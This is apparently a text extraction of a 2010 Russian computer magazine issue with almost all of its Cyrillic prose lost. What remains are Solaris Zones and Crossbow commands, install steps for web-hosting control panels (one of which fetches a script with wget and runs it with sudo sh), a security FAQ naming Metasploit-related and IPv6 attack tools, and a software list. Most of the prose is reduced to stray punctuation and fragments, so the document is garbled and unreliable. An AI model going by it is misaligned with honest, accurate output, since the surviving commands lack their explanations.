Task Editor.
, .
.
Edit,
( , ).

, , . : ,
, Excel, ,
e-mail, , /
.
.
, (
).
, ,
.

.
, Trigger Manager,
: ,
, (CPU, , ),
/ , e-mail.
Automation Anywhere
.
, , , , . Automation Anywhere Windows:
XP 2k8/7.


.
,
. , ,
xStar ter, AutoIt
AutoHotkey. z
X 09 /140/ 10

j1m@synack.ru


OPENSOLARIS
Solaris UNIX.
ZFS, DTrace Zones
,
.
, Solaris Zones.

1999 FreeBSD Jail,
. chroot,
. Jail , . ,
, Solaris Zones,
Jail,
.
Solaris Zones ,
.
, , , ,
.. ,
,
Zones ,
:
, () .
Zones ,
Solaris ( Linux).
:
,
, .
Solaris 10 ( ),
0 global.
, ,

. (init),
. (
) ,
, .

X 09 /140/ 10

.
IP-, ,
.. ( )

, .
Solaris OpenSolaris
.
BrandZ (, ,
Solaris Containers for Linux Applications), , API, , .. , BrandZ
Linux, Solaris 8, Solaris 9 Solaris 10 ( Solaris 10
OpenSolaris).
.


:
Configured .
Installed .
Ready . , : ,
, ,
ID. .
Running .
init.
Incomplete , . ,
.
Shutting down .
Down .
, ,
. .

, .

/zones, ZFS:

125

SYN/ACK

# zfs create -o mountpoint=/zones rpool/zones

, :
# zfs create rpool/zones/myzone
# zfs set quota=3g rpool/zones/myzone

.
, create:
zonecfg:apache> create

:
zonecfg:apache> set zonepath=/zones/apache


.
.
mkfile:
# mkdir /zones
# mkfile 3g /zones/myzone.img

:
#
#
#
#
#

mkdir /zones/myzone
lofiadm -a /zones/myzone.img /dev/lofi/1
newfs /dev/rlofi/1
mount /dev/lofi/1 /zones/myzone
chmod go-rwx /zones/myzone



.
Apache .
ZFS:

, :
zonecfg:apache> set autoboot=true

192.168.0.1 pcn0:
zonecfg:apache> add net
zonecfg:apache:net> set address=192.168.0.2/24
zonecfg:apache:net> set physical=pcn0
zonecfg:apache:net> end

/opt ,
:
zonecfg:apache> add inherit-pkg-dir
zonecfg:apache:inherit-pkg-dir> set dir=/opt
zonecfg:apache:inherit-pkg-dir> end

:
zonecfg:apache> info

#
#
#
#
#

zfs create -o mountpoint=/zones rpool/zones


zfs create rpool/zones/apache
zfs quota=1g rpool/zones/apache
chmod 700 /zones/apache
zfs list

,
.
Configured. zonecfg:
# zonecfg -z apache

126

, :
zonecfg:apache> verify
zonecfg:apache> commit
zonecfg:apache> exit

.
, zonecfg ,
:
X 09 /140/ 10


1. /usr/local /opt/local

( type=lofs, ,
loopback fs):
zonecfg:myzone> add fs
zonecfg:myzone:fs> set
zonecfg:myzone:fs> set
zonecfg:myzone:fs> set
zonecfg:myzone:fs> add
zonecfg:myzone:fs> end

dir=/usr/local
special=/opt/local
type=lofs
options [ro,nodevices]

/lib,
/platform, /sbin /usr, .
2. /dev/dsk/c0t0d0s7
UFS /mnt:
zonecfg:myzone:fs>
zonecfg:myzone:fs>
zonecfg:myzone:fs>
zonecfg:myzone:fs>
zonecfg:myzone:fs>

set
set
set
set
end

dir=/mnt
special=/dev/dsk/c0t0d0s7
raw=/dev/rdsk/c0t0d0s7
type=ufs

3. swap- (100 ):


zoneadm
:
# zoneadm list -v
:
# zlogin myzone shutdown
:
# zoneadm -z myzone boot

, Crossbow
zonecfg:myzone> add capped-memory
zonecfg:myzone:capped-memory> set physical=100m
zonecfg:myzone:capped-memory> set swap=100m
zonecfg:myzone:capped-memory> end

4. 50% :
zonecfg:myzone> add capped-cpu
zonecfg:myzone>capped-cpu> set ncpus=.50
zonecfg:myzone>capped-cpu> end

5. Linux-:
zonecfg:linux>
zonecfg:linux>
zonecfg:linux>
zonecfg:linux>
zonecfg:linux>
zonecfg:linux>

create -t SUNWlx
set zonepath=/zones/linux
set autoboot=true
verify
commit
exit

6. :
zonecfg:myzone> set limitpriv="default,sys_time"
zonecfg:myzone> exit

, (default),
( PRIV_SYS_TIME,
limitprev sys_time).
man- privileges(5). Apache.
Installed,
.
zoneadm -z apache install, ,
, Apache , .
'-e', ,
. AMP (Apache, MySQL, PHP):
# zoneadm -z apache install -e amp

:
# zoneadm -z myzone reboot
:
# zlogin zone1 shutdown
# zoneadm -z zone1 uninstall F
:
# zlogin zone1 shutdown
# zoneadm -z zone1 uninstall F
# zonecfg -z zone1 delete -F
X 09 /140/ 10


,
( /usr ,
),
AMP.
,
. , upgrade
,
.

127

SYN/ACK

INFO

info
Solaris Crossbow
,
10 8/07.

: OpenVZ/
Virtuozzo, LinuxVServer, FreeBSD
Jail, FreeVPS, Icore
virtual accounts AIX
Workload Partitions.

,

zoneadm
-z - clone
-.


Ready, zoneadm:
# zoneadm -z apache boot

,
init, Running.
, :
# zoneadm list -v

,
zlogin:
# zlogin -C apache

,
,
Solaris ( ,
, ..)
Apache MySQL:
# svcadm enable network/http:apache22
# svcadm enable application/database/
mysql:version_51


2009.06, OpenSolaris
Project Crossbow,

.
:

HTTP://WWW
links
www.sunhelp.
ru/archives/141Podnimaem_Debian_
Etch_v_BrandZ.html
Debian
Etch BrandZ.
wikis.sun.com/
display/BigAdmin/
Solaris+Containers
Solaris 8/9
.

128

(VNIC),
.
IP- (IP instances)
, .


VNIC-.

,

(
VNIC),
. ,
.

, -
.
,



.
,
, ,
.
Crossbow, ,

TCP/IP-.
? -, ,
,
. dladm (Data Link Administration):
# dladm create-etherstub etherstub0

:
Apache. ,
:
# dladm create-vnic -l etherstub0 host1
# dladm create-vnic -l etherstub0 apache1


ifconfig:
# ifconfig host1 plumb
# ifconfig host1 inet 192.168.0.1 up

Apache
. ,
,
:
zonecfg:apache> add net
zonecfg:apache:net> set address=192.168.0.2/24
zonecfg:apache:net> set physical=apache1
zonecfg:apache:net> end

zlogin
(Router IP Address) IP-
host1, 192.168.0.1.
Apache , Apache
. ,
NAT.
:
# routeadm -u -e ipv4-forwarding
X 09 /140/ 10

ipnat /etc/ipf/
ipnat.conf :
map pcn0 192.168.0.0/24 -> 0/32 portmap tcp/udp auto
map pcn0 192.168.0.0/24 -> 0/32

Solaris

pass in quick all
pass out quick all

NAT:
# svcadm enable network/ipfilter

/etc/ipf/ipf.conf , .
:

Apache

Apache - , - . ,
Apache
/httpd/src :
# mkdir -p /zones/apache/root/httpd/src
# cd /zones/apache/root/httpd/src
# wget www.sai.msu.su/apache/httpd/httpd-2.2.15.tar.bz2
zlogin:
# zlogin -C apache
/usr
, ,
/httpd
Apache:
#
#
#
#

cd /httpd/src
tar xjf httpd-2.2.15.tar.bz2
cd httpd-2.2.15
./configure --prefix=/httpd --enable-so \
--enable-mods-shared=all
# make install
:
# /httpd/bin/apachectl start
X 09 /140/ 10

. ,
( ) . , Apache , . , flowadm.
flowadm ,
.
QoS,
( /,

).
HTTP- httpflow:
# flowadm add-flow -l pcn0 \
-a transport=tcp,local_port=80 httpflow

, ,
() / QoS. ,
httpflow,
8 /, :
# flowadm set-flowprop -p maxbw=8M,priority=high httpflow

:
* maxbw
.
* priority ,
low, normal, high rt ( ).
* cpus (
OpenSolaris ).

, Solaris ,
.
Crossbow ,
, . z

129

SYN/ACK
grinder grinder@synack.ru


-
: , . , .
, .
,
.
SYSCP
-, OpenSource-,
, SysCP (System Control Panels, syscp.org)
, , .
: , SysCP,
, ,
,
. ,
, ,
SysCP. 2004 ,
.
SysCP.
: () ,
BIND,
. PHP,
MySQL,
.
SysCP .
:
(Apache, Lighttpd), DNS (BIND9, PowerDNS), SMTP (Postfix, Exim4),
POP3/IMAP (Courier, Dovecot), FTP (ProFTPd, Pure-ftpd),
. . : Maildrop, ClamAV
Spamassassin, PHPmyAdmin, Roundcube, SquirrelMail, WebFTP ..
,
SysCP *nix.
Debian/Ubuntu FreeBSD. Gentoo Linux openSUSE. SysCP
,
RedHat.
,
: ,
.
- , ,
, .
SysCP , ,

130

,
. , , .
webmail phpMyAdmin, , , ,
, ,
. Catch-all
, . ,
: ,
. , , .
SysCP ,
demo.syscp.org, , , -.
, SysCP,
Linux, . , Ubuntu/Debian:
$ sudo apt-get install syscp

, ,
, , .
(, , FTP-c
..) , , , .
,
.
,
,
LAMP. , ,
.

ISPMANAGER
ISPmanager (ispsystem.com/software/ispmanager) . , ,
-.
. - , . , ,
, :
X 09 /140/ 10

Lite, Pro Cluster. : FreeBSD, Linux,


Windows ( Lite-). ISPmanager Solaris. Linux, ,
, Debian ( Cluster
Debian) CentOS.

ISPmanager .
,
. :
,
, . CentOS
SELinux.
Lite ( ), , VDS,
,
, .
:
- (Apache, IIS), (MySQL, PostgreSQL), (Sendmail, Exim, Postfix CommunigatePro), POP3
(Dovecot), FTP- (ProFTPD, vsftpd), DNS- (BIND9 DNS
Windows). -
SquirrelMail, AwStats
Webalizer, phpMyAdmin phpPgAdmin. Minimalist MailMan,
.
, dnsbl.
, , ,
.
: , ( Pro Cluster), , FTP
, .
Lite Pro,
. ,
,
, . , Google Ghrome
.

, Windows exe'.
, -
. , IP,
.
X 09 /140/ 10

:
$ wget -c http://download.ispsystem.com/install.sh

:
$ sudo sh install.sh

.

. , ,
Ubuntu 10.4, /
etc/apt/source.list Debian,
.
ISPmanager.
, APT. /etc/apt/sources.list .
, :
Install most popular software ;
Minimal install (includes web server only) - Apache,
ISPmanager;
Install all supported software (default for anything)
,
MySQL PostgreSQL;
Gives you a choice of software
,
.
https://IP-/manager/
.
, ,
. , ,
.
, ,
.
.
, .
.

,
-.

131

SYN/ACK

Baifox

DTC

DTC
- Domain Technologie Control
, DNS, FTP ,
VDS. , , . ,
, IP ( DynDNS.com),
- (Amavis, Clamav, SpamAssassin), NS MX ,
, . -

-,
FTP-, , SSH MySQL, . DTC PHP,
MySQL,
.
-.
: Bind 8/9,
MySQL, Apache ( mod_security), PHP, Qmail, Postfix, Courier,
Cyrus, Dovecot, ProFTPd, Pure-ftpd, NCFTP (upload), Webalizer, Awstat,
Xen .
: root-admin, virtual admin, (
). ,
, virtual admin.
: 128 256 swap. , ,
( ), ,
6 700 .
, .

: FreeBSD, RedHat, Debian, Gentoo Mac OS X.
DTC -, .
, Debian/Ubuntu
CentOS . Ubuntu, /etc/apt/source.list: deb ftp://ftp.
gplhost.com/debian/ lenny main.
dtc 12 .

DTC
CentOS/RedHat

, DTC CentOS ,
Ubuntu. , .
CentOS dtc, , dtc.x86_64,
, Device Tree
Compiler. (DTC
RPMforge):
# wget -q ftp://ftparchive.gplhost.com/yum/gplhost.repo \
-O /etc/yum.repos.d/gplhost.repo
# wget http://dag.wieers.com/rpm/packages/rpmforge-release/
rpmforge-release-0.3.6-1.el5.rf.x86_64.rpm

yum search dtc


, CentOS Xen. :
# rpm -ivh rpmforge-release-0.3.6-1.el5.rf.x86_64.rpm
# yum install dtc-postfix-courier

, :
# /usr/share/dtc/admin/install/install --not-interactive \
--centos-init-daemons --mysql-pass PASSWORD \
--dtcadmin-pass PASSWORD
# service httpd start
# service named start
# chkconfig named on

, .

132

-
VHCS

Virtual Hosting Control System (vhcs.net)


: , .

Apache, DNS,
FTP-, , SSL- .. (
), .
: Debian, Suse 9.3+, SLES 9+,
Fedora, CentOS 4+. : Apache + PHP, Postfix, POP3
IMAP-, ProFTPd, MySQL, BIND.
- 2.4.8.
Mozilla Public License.
X 09 /140/ 10

.
,
dtc dtc-toaster,
- .
(dtc-core, dtc-cyrus, dtc-postfix-courier) . ,
,
, ,
DTC . ,
CentOS . : sudo apt-get
install dtc-toaster.
aptitude, , .
APT .
:
$ sudo nano /etc/apt/apt.conf.d/20norecommends
APT
{
Install-Recommends "false";
Install-Suggests "false";
};

DTC. /var/lib/dtc/
saved_install_config (
, ). , : sudo /usr/share/dtc/
admin/install/install.
,
, SSL-, .
:
MySQL, ,
- .
,
, .
DTC dtc. ,
synack.ru http://dtc.synack.ru/
dtcadmin https://dtc.synack.ru/dtcadmin.
, OC Linux, DTC ,
Git- . ,
, PHP.
-,
. ,
.

BAIFOX
, DTC,
. ,
, -
, , -. .
Baifox (baifox.org).
.
Baifox PHP ( PHP4 PHP5),
SQLite.
, ,
, Lighttpd, X 09 /140/ 10

INFO

info
- ispCP
,
][ 10.2008.

SysCP
Apache.
, .
, .
PHP,
cgi-bin, .. Baifox
BIND, Awstats, MySQL, PureFTPd VPOPmail.
,
, , .
. , ,
, .

. ,

.
Generate, ,
Restart service.
e-mail,

.
.
Debian/Ubuntu
baifox.org/?id=install_debian.
, . Apache2 Lighttpd ,
, ,
. Lighttpd,
. Lighttpd
7777, ,
( server.port). / admin/admin.
, ,
, .
,
, Baifox .

,
. ,
,
. ,
, , ,
. z

DVD
dvd


,
,

DTC
CentOS.

HTTP://WWW
links
SysCP
syscp.org
ISPmanager
ispsystem.com/
software/ispmanager
DTC
gplhost.com/
software-dtc.html
Baifox
baifox.org

133

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:


, - . ; , , , - ;
, ? ?


. ,
, ,
:
,
,

. ;
,
, .

-
. , , .
, ,
- . ,
- ,
. , , .
.

10 ,
.
,
, ;

134

.
,
:
, ,
, .
:
?
, ()


. ?
() - , ,
, ?
()
?
, !!!
, !
? ,

,

. ,

.


in real life?

. .
, :
;
, . :
,
.
, ,
.
.
, ,
;
.
,

, .
: , ,
. , ,
:
, .
,
.
( .
)
X 09 /140/ 10


, ,
, :
1. (,
, ,
);
2. , -
,
,
;
3. .
. , ,

.
,

:
1. .
- ,
:
, , ,
.
2. ,
, .
,

(
).
3. , ,

. X 09 /140/ 10

,
.
, .


, ,
() (, ) .

()
,
.
, , ,
, -
,
.


(insomnia) ;
, .
, , .
, ; ,
, , , , , . , .
, .
() , , , , ,
: , , .
, , -. ,
.
, ,
. .
, , - (. : ][ 05.2008). , ,
, ,
.

135

UNITS

-

- , - ,
. : , ,
, , ,
. , ,
, , .
, , , .
:
1. , , ,
. ,
,
.
2. . : , ,
, , .
3. ,
. , .
4. , . , ,
, . ,
, -
.

.
,
,
.
, , ,

.
() ?
1. . .
2.

, ,
. ,
-

.
3. .
.
:
, , ,
.

-
. , ,
.

136

,
, .

, .
, :).


Google ,
.
, , ,
() .

,
,

. ,
,
.
, , . ,
,
.
,
. : , ,

(, ); ,

. - ,
,
( ).

.
,
.
,



().

:
. , ,
.
, ;

. , .
, , .
in real life,
, , ,
. , ,
.
?
,
.
,
?
,
, . -
, (
) -
. :
,
,
.
,
.
: , ,
,
.
X 09 /140/ 10

INFO

info




,
][ 2009 .





,
?
.
.

. (!) ,
.

- -.
, : ) ; ) () ; )
,
. , .
:
,
.

.
,
; , . ,
,
, , ,
, . , ,
, - ,
. X 09 /140/ 10

: ?
, ,
, ,

,
,
. ,
, , .
.
, ,
( ),
, .
( ) ,
( )
.

,
,
.

, . ,
,
,
, ,
.
, ,

,
.
,
(
, ;

137

UNITS

.

( ),
).

:
-
, ,
-
,

, .
,
.

,
, , .. ,
,
,
.
,
:
1. , ;
2. , ;
3. .
. ,
,
, , , ,
:

138

.
, , ;
3-4 .

;
.
, , ,
;
,
;

;
- 2-3
,
, , ,
,
.
,
, ,
.
, ,
.
:
. ?
, ,
, .
,
,
.
, , ,
-

,
.
, , , ,

,
. ,

,
, .
,
.

,
.
,
:
, ;
- ;
;

,
.

, ,
.
, : ,
. z

X 09 /140/ 10

8.5

DVD

!
660 . !
? ?
.
.
( )




.

2100 .



72 000 QIWI ()
.

?
8(495)780-88-29 ( ) 8(800)200-3-999
( ,
, ).
,
info@glc.ru

1.
, ,

shop.glc.ru.
2. .
3.
:
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,
. , . 11, . 44,
, .
!
c

,
.
, ,
.
:
2100 . 12
1200 . 6
.
,

UNITS
ant

faq
united
@real.xakep.ru

Q:

Windows, ?

A: ,

. , ,
HDD,
. , , ,
,
. . ,
, ,
, .

Cipher.exe.
,

EFS (Encrypting File System),
/w.
,
. ,
,
.

140


,
Cipher.exe, /w : cipher /W:C:\
Path\To\Folder.
Q: Skype

:
import Skype4Py
skype = Skype4Py.Skype()
skype.Attach()

( , ICQ). ,

. ?

A: Python,
.
Skype,
Skype4Py (skype4py.sourceforge.net/doc/html).

API- Skype, , ,
, , , .

, ,
- , , .
, Skype
. , ,

print 'Your full name:', \


skype.CurrentUser.FullName
print 'Your contacts:'
for user in skype.Friends:
print '
', user.FullName

Q: Wi-Fi
?

A: ,
Wi-Fi
, .
, ,
( 1 11),
AP.

,
,
,
.
X 09 /140/ 10

Wi-Fi , inSSIDer (www.metageek.net/products/


inssider), .
Q: , , IPv6. , .

. ,

( Scapy
IPv6 , , ).
: , - ?

A:
,
IPv6, -,
THC, security-.
THC-IPV6 (freeworld.thc.org/thcipv6), IPv6-
ICMP6-.
,
IPv6. ,
. ,

.
,
THC-IPV6

security- .
Q: ,
,
- ,
.

Android SDK
A: , . -,
,

.

:

A:
kanicq.ru/invisible.
:
1. . : Trillian
Miranda IM.
2. . ,
, QIP R&Q,
. ICQ 6 ,
,
- .
3. . UIN,
, ( !)
-.
Q: , , JavaScript-.
,

Firefox- JavaScript
Deobfuscator?
X 09 /140/ 10

"clsid:0955AC62-BF2E-4CBAA2B9-A63F772D46CF"

"\x63\x6c\x73\x69\x64\x3a\x30\x39\
x35\x35\x41\x43\x36\x32\x2d\x42\
x46\x32\x45\x2d\x34\x43\x42\x41\
x2d\x41\x32\x42\x39\x2d\x41\x36\
x33\x46\x37\x37\x32\x44\x34\x36\
x43\x46"

, ... . -,
,
,
.
,
.

, , ,
,
. .
Q:
. IDA,

JavaScript ,
/
.
,

. . , JSidle
(github.com/svent/jsidle)
,
. ?
,

.

exe?

A:
. ROM-
. ,
, IDA , .
IDA (Load a new file)
Binary file.
Intel 80x86 processors: metapc.

Loading sergment Loading offset
. - ,

141

UNITS

. ?
: Windows 7, Ubuntu 10.4
Hackintosh.


Zero Wine
,
. ,
(16 32
), IDA
.

,
Wi-Fi
,
.
Q: ,
Metasploit
, , ..
:

Q: , -

? ,

? :

A:
Antimeter (www.mertsarica.com/
codes/antimeter2.zip).
. :

A:
.
,
,

, .
Windows
( -> ). ,
,
Windows, . ,


-. ,
-,
.
Q: ,

t [ ]

( );
a
meterpreter (
);
d
meterpreter ( );
e .

. ,

Q: DOS'

CPU,

. , DOSBox' -

142

Q: -
, :
, . ,
?

A: ,

Zero Wine (zerowine.
sourceforge.net).
,
Windows- WINE , API-, .
, .
Q:
Android,

?

5
meterpreter: antimeter.exe -t 5 -a.

A: , Intel
32
AESNI (Intel Advanced Encryption Standard
Instructions).

, AES.

3-10
. ,
CPU ( Intel i5 i7), . TrueCrypt (www.truecrypt.org)
,
.

A: Ubuntu GRUB2 Ext4FS, ,


. , EasyBCD (neosmart.
net/blog). ,
,
:
Windows 7
;
, boot.ini
;
GRUB2
Ext4FS;
ISO- VHD- (
);
OS X;
EasyBCD BIOS Extender,
, USB,
.

A:
DOSBox', ScummVM
(www.scummvm.org).
:
,
iPhone, Maemo Symbian
S60/UIQ3,
Windows CE (, GPS-)
Samsung (2009 ).
Q: Ubuntu

. ,

A: Android'
,
Google (developer.android.com/
sdk/index.html). Java. SDK : Android 2.2
1.5. ,
(, 2.2).
SDK Android SDK
AVD Manager.
Android' (Android Virtual Device, AVD): New ,

Target Android'.
SD,
,
.

Start. Google,
. z
X 09 /140/ 10

>Net
Calimero Skype Launcher 1.1
Dropbox 0.7.110

>Multimedia
1by1 1.70
Anki 1.0
calibre 0.7.12
FastStone Image Viewer 4.2
Freemake Video Converter 1.1.7
Hamster Free Video Converter
1.0.0.3
HandBrake 0.9.4
Image Resizer 2.1
ImgBurn 2.5.1.0
Mp3tag v2.46a
PDF-XChange Viewer 2.054
PDFCreator 1.0.1

>Misc
Bend 0.93
Desktop Manager BBox 2010
Dexpot 1.5.5
Dropbox Shell Tools 0.1.1
FileMenu Tools 5.8.1
Hidden Menu 2.2 R2
HostsMan 3.2.73
KeePass 2.12
My Lockbox 2.1
P2 eXplorer v2.1
PeaZip 3.2.1
Prey 0.4
Q-Dir 4.31
SuperCopier 2.2 Beta
Switch Off 3.3.2
The Windows 7 SBB Tool
UltraSearch 1.3
USBDeview v1.75
Visual Understanding Environment
(VUE) 3.0.2
WikiTaxi 1.3.0
WinOMeter
Workrave 1.9.1

>Games
Free Heroes2
Steam
Super Mario Bros. X 1.2.2

Flash:
Adobe Flash Builder 4
Box2DFlash 2.1a
FDT4
Flash Professional CS5
FlashDevelop 3.2.2 RTM

>System
AVZ 4.34
Comodo Programs
Manager 1.0
DriverBackup 2.1
EasyBCD 2.0.1
Panda Cloud Antivirus
Partition Wizard
Home Edition 5.0
Process Hacker 2.1
Revo Uninstaller
SpeedFan 4.4
ThreatFire AntiVirus Free Edition
4.7.0.17
WebTemp 3.31

>Secure
Deblaze 0.3
Fiddler 2.3.0.0
HstEx 3.5
IDAStealth Plugin
JavaSnoop 1.0RC4
Nikto 2.1.2
PlainSight 0.1
PROTECTiON iD v6.4.0
The Sleuth Kit (TSK) 3.1.3
Tizer Rootkit Razor
TrueCrypt 7.0
Vasto 0.2
WATOBO 0.9.2
Web Historian 2.0
WinTaylor 2.0

>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.3.1221
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.3
Firefox 3.6.8
foobar2000 v1.1 beta 1
K-Lite Mega Codec Pack 6.2.0
Miranda 0.8.27
Notepad++ 5.7
Opera 10.60
PuTTY 0.60
Skype 4.2
Sysinternals Suite ()
Total Commander 7.55
Unlocker 1.9.0
Xakep CD DataSaver 6.0
XnView 1.97.6

FeedDemon 3
freeFTPd 1.0.11
freeSSHd 1.2.6
LastPass 1.69.0
MDownloader 0.15
Mikogo 3.0
Pidgin 2.7.1
TCP Profiles Manager
The Dude 4.0.2beta
WinSCP 4.2.8
Wireshark 1.2.10

>Security
Adsuck 1.8
Andiparos 1.0

>Net
Gnubiff 2.2.13
I2P 0.8
Instantbird 0.2
Kstm 0.1
KVIrc 4.0.0
Lightspark 0.4.2
Mozilla Firefox 3.6.8
Mrdx 0.2
Nullfxp 2.0.2
Opera 10.60
Pidgin 2.7.2
ReKonq 0.5
Remmina 0.8
RSS-torrent 0.8
RTMDump 2.3
Transmission 2.03
Twitux 0.69

>Games
Frogatto 1.0

>Devel
BuGLe 0.0.20100718
CodeLite 2.6.0
CouchDB 1.0
Gcc 4.5.0
Git 1.7.2
Glom 1.14.4
KDevelop 4.0.1
libjpeg-turbo 1.0.0
Mono 2.6.7
MySQL-python 1.2.3
Php 5.3.3
Python 2.7
Redmine 1.0.0
Scala 2.8.0
SQLite 3.7.0
Tomcat 7.0.0
Twisted 10.1.0

>>UNIX
>Desktop
Cheese 2.30.1
Cortina 0.5.0
CScreenie 1.1
Cuneiform 1.0
GIMP 2.7.1
KeepNote 0.6.4
LuxRender 0.7
Me TV 1.3.1
Midnight Commander 4.7.3
Pinta 0.4
Ramen 0.6.1
Shotwell 0.6
Speakingface
Sweet Home 3D 2.5
Ventana3d 0.6.1
VLC 1.1.1
Wumwum 0.9
Yakuake 2.9.7

>X-distr
Mandriva 2010.1

>System
Cabextract 1.3
Compiz 0.9.0
Ddrescue 1.12
FreeType 2.4.0
Fuse-ExFAT 0.9.1
Linux Kernel 2.6.34.1
Muon 0.2
QEMU 0.12.5
ROXTerm 1.18.5
Rsyslog 5.5.6
Sudo 1.7.3
Tiny Core 3.0
Wine 1.2

>Server
Apache 2.2.16
Asterisk 1.6.2.10
BIND 9.7.1
Courier-imap 4.8.0
CUPS 1.4.4
DHCP 4.2.0
Monkeyd 0.11.0
MySQL 5.1.48
OpenLDAP 2.4.23
OpenSSH 5.5
OpenVPN 2.1.1
Postfix 2.7.1
PostgreSQL 8.4.4
ProFTPD 1.3.3
Samba 3.5.4
Sendmail 8.14.4
Siege 2.70
Squid 3.1.5
Vsftpd 2.2.2
Ziproxy 3.1.3

Gnupg 2.0.16
GnuTLS 2.10.0
Inundator 0.5
Metasploit framework 3.4.1
nwmap 0.1
Packetfence 1.9.0
PHPJackal
Remnux 1.0
Sagan 0.1.3
Skipfish 1.52b
Suricata 1.0.0
TrueCrypt 7.0
w3af 1.0
Watobo 0.9.2
Webenum 0.1
WhatWeb 0.4.4
/ STUXNET

09(140) 2010

>>WINDOWS
>Development
mongoDB 1.4.4
Erlang R14A
HiAsm 4.4
mono 2.6.7
Python 3.2 alpha 1
SQLiteSpy 1.8.14
WinMerge 2.12.4
x 09 () 2010
140

. 54

. 82

TDSS



STUXNET

. 37



: 2
10
.

. 104


WI-FI
WINDOWS 7

TITANIUM

. 70


0DAY-

DEP ASLR

JIT SPRAY

09 (140) 2010

CMS :

UNITS

HTTP:// WWW2

Ruby

CLOUDSHARK

TRYRUBY!

CloudShark? :
Wireshark, -.
, ,
, Wireshark
. PCAP- ,
,

. , HTTP-,
-
.

15 ?
Ruby, - ( Twitter) security- (, MetaSploit). TryRuby!
,
, . ,
TryRuby .

. ,
.. , Python
www.trypython.org.

www.cloudshark.org

SIP-

TALKPAD

www.talkpad.ru
, , Skype ,
talkpad. , IP-, .
;
(Firefox, Internet
Explorer, Google Chrome, Opera). . ,
10 ,
20 :).

144

www.tryruby.org

STACKOVERFLOW

www.stackoverflow.com
,
, .
,
, advanced- .
, , , . , , ,
. ,
.
, . ,
.
X 09 /140/ 10